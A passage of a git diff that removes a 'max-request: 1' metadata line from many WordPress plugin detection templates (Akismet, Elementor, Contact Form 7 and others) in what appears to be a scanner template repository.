b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a76d3306bb..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 2249681b6d..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b5389b27c9..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 00d183f507..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 451e1daef1..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index af30ca76b6..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 93823466d4..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - 